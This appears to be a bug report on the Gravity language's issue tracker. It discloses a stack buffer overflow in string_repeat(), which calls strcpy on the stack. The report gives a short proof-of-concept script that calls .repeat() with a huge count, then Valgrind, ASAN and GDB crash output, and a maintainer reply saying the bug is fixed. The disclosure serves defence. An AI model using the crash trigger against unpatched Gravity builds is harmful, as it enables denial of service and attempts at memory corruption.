Stack Overflow (String.repeat() \ strcpy)

[r0t0tiller]

There is a stack based buffer overflow in the string_repeat() function in gravity_core.c. Using the testcase below an attacker can overflow the integers of .repeat() as well, use the var to gain complete control of the program's memory. Attached is the Valgrind, ASAN, and GDB output. Would recommend not using strcpy or memcpy unless you can ensure that bounds are being checked on both the dest and src strings.

func main() {

var a = "AAAAAAAAAAAAAAAAAAAAAAAA";

a.repeat(100000000000000000);

return a;

}

Valgrind:

==3080== Memcheck, a memory error detector
==3080== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.
==3080== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info
==3080== Command: ./gravity /home/ctf/Desktop/string.gravity
==3080==
==3080== Warning: client switching stacks? SP change: 0xffeffe970 --> 0xf0f866958
==3080== to suppress, use: --max-stackframe=4017717272 or greater
==3080== Invalid write of size 8
==3080== at 0x42375D: string_repeat (in /home/ctf/Desktop/Updated_Gravity/gravity/gravity)
==3080== Address 0xf0f866958 is on thread 1's stack
==3080==
==3080==
==3080== Process terminating with default action of signal 11 (SIGSEGV)
==3080== Access not within mapped region at address 0xF0F866958
==3080== at 0x42375D: string_repeat (in /home/ctf/Desktop/Updated_Gravity/gravity/gravity)
==3080== If you believe this happened as a result of a stack
==3080== overflow in your program's main thread (unlikely but
==3080== possible), you can try to increase the size of the
==3080== main thread stack using the --main-stacksize= flag.
==3080== The main thread stack size used in this run was 8388608.
==3080== Invalid write of size 8
==3080== at 0x4A28680: _vgnU_freeres (in /usr/lib/valgrind/vgpreload_core-amd64-linux.so)
==3080== Address 0xf0f866950 is on thread 1's stack
==3080==
==3080==
==3080== Process terminating with default action of signal 11 (SIGSEGV)
==3080== Access not within mapped region at address 0xF0F866950
==3080== at 0x4A28680: _vgnU_freeres (in /usr/lib/valgrind/vgpreload_core-amd64-linux.so)
==3080== If you believe this happened as a result of a stack
==3080== overflow in your program's main thread (unlikely but
==3080== possible), you can try to increase the size of the
==3080== main thread stack using the --main-stacksize= flag.
==3080== The main thread stack size used in this run was 8388608.
==3080==
==3080== HEAP SUMMARY:
==3080== in use at exit: 74,372 bytes in 1,029 blocks
==3080== total heap usage: 1,078 allocs, 49 frees, 78,648 bytes allocated
==3080==
==3080== LEAK SUMMARY:
==3080== definitely lost: 264 bytes in 6 blocks
==3080== indirectly lost: 1,384 bytes in 17 blocks
==3080== possibly lost: 0 bytes in 0 blocks
==3080== still reachable: 72,724 bytes in 1,006 blocks
==3080== suppressed: 0 bytes in 0 blocks
==3080== Rerun with --leak-check=full to see details of leaked memory
==3080==
==3080== For counts of detected and suppressed errors, rerun with: -v
==3080== ERROR SUMMARY: 2 errors from 2 contexts (suppressed: 0 from 0)
Segmentation fault (core dumped)

ASAN:

ASAN:SIGSEGV

==3033==ERROR: AddressSanitizer: stack-overflow on address 0x7ffd0a2a5418 (pc 0x00000042375d bp 0x7ffd2201e880 sp 0x7ffd0a2a5420 T0)
#0 0x42375c in string_repeat (/home/ctf/Desktop/Updated_Gravity/gravity/gravity+0x42375c)
#1 0x41bbcb in gravity_vm_exec (/home/ctf/Desktop/Updated_Gravity/gravity/gravity+0x41bbcb)
#2 0x41fc72 in gravity_vm_runmain (/home/ctf/Desktop/Updated_Gravity/gravity/gravity+0x41fc72)
#3 0x401777 in main (/home/ctf/Desktop/Updated_Gravity/gravity/gravity+0x401777)
#4 0x7f691a2a582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#5 0x401988 in _start (/home/ctf/Desktop/Updated_Gravity/gravity/gravity+0x401988)

SUMMARY: AddressSanitizer: stack-overflow ??:0 string_repeat

GDB:

[----------------------------------registers-----------------------------------]
RAX: 0xef798010
RBX: 0x0
RCX: 0xe8d4a51000
RDX: 0x2
RSI: 0x65d6e0 ('A' <repeats 15 times>...)
RDI: 0x7fff108649d0
RBP: 0x7fffffffda30 --> 0x6481d0 --> 0x64c610 --> 0x64a1d0 (0x000000000064a1d0)
RSP: 0x7fff108649d0
RIP: 0x42375d (<string_repeat+317>: call 0x401180 strcpy@plt)
R8 : 0x4
R9 : 0x655d10 --> 0x64a570 --> 0x64a1d0 (0x000000000064a1d0)
R10: 0x64b050 --> 0x64a1d0 (0x000000000064a1d0)
R11: 0x40 ('@')
R12: 0x648010 --> 0x6497b0 --> 0x1100000100
R13: 0x2
R14: 0x7fff108649d0
R15: 0x65d550 --> 0x64c610 --> 0x64a1d0 (0x000000000064a1d0)
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x423754 <string_repeat+308>: sub rsp,rax
0x423757 <string_repeat+311>: mov rdi,rsp
0x42375a <string_repeat+314>: mov r14,rsp
=> 0x42375d <string_repeat+317>: call 0x401180 strcpy@plt
0x423762 <string_repeat+322>: mov rcx,QWORD PTR [rbp-0x1048]
0x423769 <string_repeat+329>: lea rax,[rcx-0x1]
0x42376d <string_repeat+333>: cmp rcx,0x1
0x423771 <string_repeat+337>: mov QWORD PTR [rbp-0x1048],rax
Guessed arguments:
arg[0]: 0x7fff108649d0
arg[1]: 0x65d6e0 ('A' <repeats 15 times>...)
[------------------------------------stack-------------------------------------]
Invalid $SP address: 0x7fff108649d0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x000000000042375d in string_repeat ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
[─────────────────────────────────────────────────────────────REGISTERS─────────────────────────────────────────────────────────────]
*RAX 0xef798010
RBX 0x0
*RCX 0xe8d4a51000
*RDX 0x2
*RDI 0x7fff108649d0
*RSI 0x65d6e0 ◂— 0x4141414141414141 ('AAAAAAAA')
*R8 0x4
*R9 0x655d10 —▸ 0x64a570 —▸ 0x64a1d0 ◂— 0x64a1d0
*R10 0x64b050 —▸ 0x64a1d0 ◂— 0x64a1d0
*R11 0x40
*R12 0x648010 —▸ 0x6497b0 ◂— 0x1100000100
*R13 0x2
*R14 0x7fff108649d0
*R15 0x65d550 —▸ 0x64c610 —▸ 0x64a1d0 ◂— 0x64a1d0
*RBP 0x7fffffffda30 —▸ 0x6481d0 —▸ 0x64c610 —▸ 0x64a1d0 ◂— ...
*RSP 0x7fff108649d0
*RIP 0x42375d (string_repeat+317) ◂— call 0x401180
[───────────────────────────────────────────────────────────────CODE────────────────────────────────────────────────────────────────]
► 0x42375d <string_repeat+317> call strcpy@plt <0x401180>
dest: 0x7fff108649d0
src: 0x65d6e0 ◂— 0x4141414141414141 ('AAAAAAAA')

0x423762 <string_repeat+322> mov rcx, qword ptr [rbp - 0x1048]
0x423769 <string_repeat+329> lea rax, [rcx - 1]
0x42376d <string_repeat+333> cmp rcx, 1
0x423771 <string_repeat+337> mov qword ptr [rbp - 0x1048], rax
0x423778 <string_repeat+344> je string_repeat+377 <0x423799>

0x42377a <string_repeat+346> nop word ptr [rax + rax]
0x423780 <string_repeat+352> mov rsi, qword ptr [r15 + 0x18]
0x423784 <string_repeat+356> mov rdi, r14
0x423787 <string_repeat+359> add rbx, 1
0x42378b <string_repeat+363> call strcat@plt <0x4013d0>
[───────────────────────────────────────────────────────────────STACK───────────────────────────────────────────────────────────────]
<Could not read memory at 0x7fff108649d0>
[─────────────────────────────────────────────────────────────BACKTRACE─────────────────────────────────────────────────────────────]
► f 0 42375d string_repeat+317
f 1 41bbcc gravity_vm_exec+19772
f 2 41fc73 gravity_vm_runmain+243
f 3 401778 main+744
f 4 7ffff751d830 __libc_start_main+240
Program received signal SIGSEGV (fault address 0x7fff108649c8)

[marcobambini]

I agree. Fixed by 00e53c3